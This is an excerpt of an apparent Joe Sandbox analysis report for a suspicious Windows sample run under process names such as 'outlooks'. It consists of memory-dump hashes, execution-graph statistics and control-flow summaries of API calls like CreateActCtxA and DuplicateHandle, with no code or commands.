                                                                            • Opcode ID: e5fde273494a0456c5a0dc469b11c23bfd9a044a0e12dc74509de2b2979cbe18
                                                                            • Instruction ID: e289c54e396c09f03b25d400aa04d7cebc1d5c6b8076e8ba51c706c81a35a037
                                                                            • Opcode Fuzzy Hash: e5fde273494a0456c5a0dc469b11c23bfd9a044a0e12dc74509de2b2979cbe18
                                                                            • Instruction Fuzzy Hash: CEC08C3442420CCFFA205A62D4497643B9CEB0433BF1022DCEC0885181CB7244D3C597
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.3911236782.00000000082A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_82a0000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                                                            • Instruction ID: a5ced1602b898661de329531365079a034e3d75a808f59c5ffcbefa728424f66
                                                                            • Opcode Fuzzy Hash: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                                                            • Instruction Fuzzy Hash: 58C0927A140208EFC700DF69E848C85BBB8EF1977171180A1FA088B332C732EC60DA94
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.3911236782.00000000082A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_82a0000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 20d9ab8db520123c5b8d7d2464aace53457b97e79d33cc772015ab6ab7933399
                                                                            • Instruction ID: 15d48e204560f693536ceb49acc2283d13906578a2ef595cda0843c6ce5d7324
                                                                            • Opcode Fuzzy Hash: 20d9ab8db520123c5b8d7d2464aace53457b97e79d33cc772015ab6ab7933399
                                                                            • Instruction Fuzzy Hash: F0B09236004208AB86019A84E904896BB69AB586017008025B609061518B32A922DB94

                                                                            Execution Graph

                                                                            Execution Coverage:8.1%
                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                            Signature Coverage:0%
                                                                            Total number of Nodes:83
                                                                            Total number of Limit Nodes:10
                                                                            execution_graph: rendered call-graph data for the 02B50000 dump (83 nodes, 10 limit nodes); the raw edge list is omitted here as it does not render as text. Functions in the graph lie between 2b5421c and 2b5e3bf and reach the APIs DuplicateHandle, GetModuleHandleW, CreateActCtxA and KiUserCallbackDispatcher.

                                                                            Control-flow Graph

                                                                            Memory Dump Source
                                                                            • Source File: 00000022.00000002.1688039445.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_34_2_2b50000_eNuXmIwkixzW.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule
                                                                            • String ID:
                                                                            • API String ID: 4139908857-0
                                                                            • Opcode ID: 55b6577b0afcb048482fe02d8746151d55db90c2a34cb0ff27772f8f9cd6dd43
                                                                            • Instruction ID: 108042a008ffc19a2a5d06a424877dd90deb1139b46cc784a3f8c9abe810f634
                                                                            • Opcode Fuzzy Hash: 55b6577b0afcb048482fe02d8746151d55db90c2a34cb0ff27772f8f9cd6dd43
                                                                            • Instruction Fuzzy Hash: BC7126B0A00B158FD724DF69D44175ABBF6FF88704F048A6ED88ADBA40DB75E845CB90

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 56 2b56414-2b57431 CreateActCtxA 59 2b57433-2b57439 56->59 60 2b5743a-2b57494 56->60 59->60 67 2b57496-2b57499 60->67 68 2b574a3-2b574a7 60->68 67->68 69 2b574a9-2b574b5 68->69 70 2b574b8 68->70 69->70 71 2b574b9 70->71 71->71
                                                                            APIs
                                                                            • CreateActCtxA.KERNEL32(?), ref: 02B57421
                                                                            Memory Dump Source
                                                                            • Source File: 00000022.00000002.1688039445.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_34_2_2b50000_eNuXmIwkixzW.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            • Opcode ID: 79bea8d329d48471b80fa8a710eba29198a7c549d8040f493f5016a854df5207
                                                                            • Instruction ID: 6b349e367e489f1f522d76f8c5506adfed6d78cc0252fd8c1e22d670137eaa90
                                                                            • Opcode Fuzzy Hash: 79bea8d329d48471b80fa8a710eba29198a7c549d8040f493f5016a854df5207
                                                                            • Instruction Fuzzy Hash: B641BF70D00729CBDB25DFA9C844B9EFBF6BF48704F2480AAD408AB251DB756946CF90

                                                                            Control-flow Graph

                                                                            control_flow_graph 73 2b57364-2b5736b 74 2b57370-2b57431 CreateActCtxA 73->74 76 2b57433-2b57439 74->76 77 2b5743a-2b57494 74->77 76->77 84 2b57496-2b57499 77->84 85 2b574a3-2b574a7 77->85 84->85 86 2b574a9-2b574b5 85->86 87 2b574b8 85->87 86->87 88 2b574b9 87->88 88->88
                                                                            APIs
                                                                            • CreateActCtxA.KERNEL32(?), ref: 02B57421
                                                                            Memory Dump Source
                                                                            • Source File: 00000022.00000002.1688039445.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_34_2_2b50000_eNuXmIwkixzW.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            • Opcode ID: 0466ef59aafad352543ef065450909ab1d588b9b0d5f1f02f8fc7ba1bf9c552e
                                                                            • Instruction ID: 085864e5105fe96fd7553e54ac6c3b6d5b48cc2deaecbca2d2c982d2af2cc514
                                                                            • Opcode Fuzzy Hash: 0466ef59aafad352543ef065450909ab1d588b9b0d5f1f02f8fc7ba1bf9c552e
                                                                            • Instruction Fuzzy Hash: F341AE71D00729CBEB25CFA9C844B8EBBF6BF49704F24806AD418AB251DB756946CF90

                                                                            Control-flow Graph

                                                                            control_flow_graph 90 2b56780-2b56783 92 2b56788-2b5681c DuplicateHandle 90->92 93 2b56825-2b56842 92->93 94 2b5681e-2b56824 92->94 94->93
                                                                            APIs
                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02B5674E,?,?,?,?,?), ref: 02B5680F
                                                                            Memory Dump Source
                                                                            • Source File: 00000022.00000002.1688039445.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_34_2_2b50000_eNuXmIwkixzW.jbxd
                                                                            Similarity
                                                                            • API ID: DuplicateHandle
                                                                            • String ID:
                                                                            • API String ID: 3793708945-0
                                                                            • Opcode ID: fdf93f61b1501d9a27a99bb63753baa9b32881a048ab520a6a8158a0485efd1d
                                                                            • Instruction ID: 5e7c9a4061df5bd380fe2d36964afe0770669e377350510146bbd881e71e5a66
                                                                            • Opcode Fuzzy Hash: fdf93f61b1501d9a27a99bb63753baa9b32881a048ab520a6a8158a0485efd1d
                                                                            • Instruction Fuzzy Hash: 132105B59002589FDB10CF9AD884BDEBBF9EB48314F14801AE918A7310D378A944CFA5

                                                                            Control-flow Graph

                                                                            control_flow_graph 97 2b5611c-2b5681c DuplicateHandle 99 2b56825-2b56842 97->99 100 2b5681e-2b56824 97->100 100->99
                                                                            APIs
                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02B5674E,?,?,?,?,?), ref: 02B5680F
                                                                            Memory Dump Source
                                                                            • Source File: 00000022.00000002.1688039445.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_34_2_2b50000_eNuXmIwkixzW.jbxd
                                                                            Similarity
                                                                            • API ID: DuplicateHandle
                                                                            • String ID:
                                                                            • API String ID: 3793708945-0
                                                                            • Opcode ID: 46ecfde988c656911fabdea2c1a9273a30105f9854e518b59860e0db7b8165b6
                                                                            • Instruction ID: 3aeda71c22234cc66a2bed53ff9fb9e8bdc2b695439c84c19cb932d4b8d8bb64
                                                                            • Opcode Fuzzy Hash: 46ecfde988c656911fabdea2c1a9273a30105f9854e518b59860e0db7b8165b6
                                                                            • Instruction Fuzzy Hash: CE21E6B59003589FDB10CF9AD884BDEBBF9FB48310F14845AE918A7350D378A944CFA5

                                                                            Control-flow Graph

                                                                            control_flow_graph 103 2b5af60-2b5c230 105 2b5c232-2b5c235 103->105 106 2b5c238-2b5c263 GetModuleHandleW 103->106 105->106 107 2b5c265-2b5c26b 106->107 108 2b5c26c-2b5c280 106->108 107->108
                                                                            APIs
                                                                            • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,02B5C01C), ref: 02B5C256
                                                                            Memory Dump Source
                                                                            • Source File: 00000022.00000002.1688039445.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_34_2_2b50000_eNuXmIwkixzW.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule
                                                                            • String ID:
                                                                            • API String ID: 4139908857-0
                                                                            • Opcode ID: 0032b498915eb9d20ce82decd96d1df1d613bc08c520dbdcd6b927b876950471
                                                                            • Instruction ID: ea24aa34783d75aaa711f0287ea51faf709be199f373926bc6cefb888dccd614
                                                                            • Opcode Fuzzy Hash: 0032b498915eb9d20ce82decd96d1df1d613bc08c520dbdcd6b927b876950471
                                                                            • Instruction Fuzzy Hash: 131132B5C003598FCB10DF9AC444BDEFBF5EB88614F10846AD929BB200C379A945CFA4
                                                                            Memory Dump Source
                                                                            • Source File: 00000022.00000002.1685119061.0000000002ACD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02ACD000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_34_2_2acd000_eNuXmIwkixzW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 08cd23de4a35f5441d7cc65d223fa09f6626e83d94c29fd839c5dd1fdd490233
                                                                            • Instruction ID: b55997901c8e61343484cc5e291cd927306ed1df08dfefb8556d3af64334dff4
                                                                            • Opcode Fuzzy Hash: 08cd23de4a35f5441d7cc65d223fa09f6626e83d94c29fd839c5dd1fdd490233
                                                                            • Instruction Fuzzy Hash: DA210071604B00EFDB14DF18D8C0B16BBA1FB84224F30C57DD84A0B246CB3AD807CA62
                                                                            Memory Dump Source
                                                                            • Source File: 00000022.00000002.1685119061.0000000002ACD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02ACD000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_34_2_2acd000_eNuXmIwkixzW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: de5c47d5cf5cab9ec5956e431e03c3a6b747b2a5d7f38f72fab0dcbcfe3833a8
                                                                            • Instruction ID: 4a982bc326ac49800c7956035aa54853095f0c1d8c26cf77c27c446c2828a880
                                                                            • Opcode Fuzzy Hash: de5c47d5cf5cab9ec5956e431e03c3a6b747b2a5d7f38f72fab0dcbcfe3833a8
                                                                            • Instruction Fuzzy Hash: ED2180755097808FCB02CF24D5D4715BF71EB46214F28C5EED8898F6A7C33A940ACB62

                                                                            Execution Graph

                                                                            Execution Coverage:7.7%
                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                            Signature Coverage:0%
                                                                            Total number of Nodes:118
                                                                            Total number of Limit Nodes:12
                                                                            execution_graph: rendered call-graph data for the 16d0000 region (118 nodes, 12 limit nodes); the raw edge list is omitted here as it does not render as text. Functions in the graph lie between 16d421c and 16de3bf and reach the APIs CreateActCtxA, KiUserCallbackDispatcher, GetModuleHandleW and DuplicateHandle.

Control-flow Graph

APIs
• CreateActCtxA.KERNEL32(?), ref: 016D7421
Strings
Memory Dump Source
• Source File: 00000023.00000002.1685762252.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_35_2_16d0000_outlooks.jbxd
Similarity
• API ID: Create
• String ID: U
• API String ID: 2289755597-3372436214
• Opcode ID: 7b1dea964afc4af587b63de3ebf20964b26f45756e1dbdb539d9a30fdc92e3b9
• Instruction ID: 2ecb8da425308a736adf81798863c607619c34e93502fbf0ce90dc488c403aa0
• Opcode Fuzzy Hash: 7b1dea964afc4af587b63de3ebf20964b26f45756e1dbdb539d9a30fdc92e3b9
• Instruction Fuzzy Hash: F241E370C01728CFEB25CFA9C844BDEBBB5BF48704F20806AD409AB251DB755946CF91

Control-flow Graph

Memory Dump Source
• Source File: 00000023.00000002.1685762252.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_35_2_16d0000_outlooks.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
• Opcode ID: 56981e664ba60d67a28c623d7fd9464dcb344710c34303fd604bebf672dd89f3
• Instruction ID: d612b8f2df53c11e6cdf7899554ebd479a9850a87009c1528c8102e8222cfb41
• Opcode Fuzzy Hash: 56981e664ba60d67a28c623d7fd9464dcb344710c34303fd604bebf672dd89f3
• Instruction Fuzzy Hash: C27157B0A00B099FE724DF6AC84075ABBF6FF88600F00896DD44AD7B40DB75E846CB91

Control-flow Graph

APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,016D674E,?,?,?,?,?), ref: 016D680F
Memory Dump Source
• Source File: 00000023.00000002.1685762252.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_35_2_16d0000_outlooks.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: 40d88636be4cb3f3231b85e57a0de8bbe808a62d7648c6151181ebb1229e07d0
• Instruction ID: 8c2d3afc4abffddb310b0e74941d2187e05eceeff110a28fa9726b9d57f2f021
• Opcode Fuzzy Hash: 40d88636be4cb3f3231b85e57a0de8bbe808a62d7648c6151181ebb1229e07d0
• Instruction Fuzzy Hash: 0C413C76900248AFDF11CF99D844AEEBFF5FB48310F15805AE914A7311D7359911DFA0

Control-flow Graph

APIs
• CreateActCtxA.KERNEL32(?), ref: 016D7421
Memory Dump Source
• Source File: 00000023.00000002.1685762252.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_35_2_16d0000_outlooks.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
• Opcode ID: 82ab7fc1c5677e74c3df4b8ee633521df8a177c9a3084500d66a04df4c99e430
• Instruction ID: b6ea8672a16cd8501ba761ebd37e540e447babe34b626990feeb856554bbfa02
• Opcode Fuzzy Hash: 82ab7fc1c5677e74c3df4b8ee633521df8a177c9a3084500d66a04df4c99e430
• Instruction Fuzzy Hash: 0D41C270C01719CFEB25DFAAC844B9EBBB5BF48704F20806AD409AB251DB756946CF91

Control-flow Graph

APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,016D674E,?,?,?,?,?), ref: 016D680F
Memory Dump Source
• Source File: 00000023.00000002.1685762252.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_35_2_16d0000_outlooks.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: cc23b051602a9a2d77377add24e18662f283b327ab260d2a058db213f029056a
• Instruction ID: 19d91cae0f51cdaf8fa0e12dc12085802f926a79686852c9bb0731cb08814e1d
• Opcode Fuzzy Hash: cc23b051602a9a2d77377add24e18662f283b327ab260d2a058db213f029056a
• Instruction Fuzzy Hash: 7E21E4B59002489FDB10CFAAD884AEEBBF4EB48220F15805AE818A3351D778A940CF65

Control-flow Graph

APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,016D674E,?,?,?,?,?), ref: 016D680F
Memory Dump Source
• Source File: 00000023.00000002.1685762252.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_35_2_16d0000_outlooks.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: 633022bff8eef9abb6b3fd7e68a2a6921a5f0bb4ca4a88ba3305a2e7e077c05b
• Instruction ID: 52ac3d5f9bcb79b65a0bd364a182dbcdced0327c7a26818f8a531b04a327a0c9
• Opcode Fuzzy Hash: 633022bff8eef9abb6b3fd7e68a2a6921a5f0bb4ca4a88ba3305a2e7e077c05b
• Instruction Fuzzy Hash: 7721B7B5D00248DFDB10CF9AD884ADEBBF5EB48310F14841AE914A7350D378A954CFA5

Control-flow Graph

APIs
• GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,016DC01C), ref: 016DC256
Memory Dump Source
• Source File: 00000023.00000002.1685762252.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_35_2_16d0000_outlooks.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
• Opcode ID: dc843b8517c3cd29b62971a18c2db2c0bfdadf9d2d98c53ab99ec0d9445156e9
• Instruction ID: 6dd3e002524c49b79095a6381751fd6580bb8cdaca9fd6d272f37bf29b5f94ce
• Opcode Fuzzy Hash: dc843b8517c3cd29b62971a18c2db2c0bfdadf9d2d98c53ab99ec0d9445156e9
• Instruction Fuzzy Hash: 4911F0B5C006498FDB14DF9AC844B9EFBF5EB88220F10856AD919A7200C379A545CFA5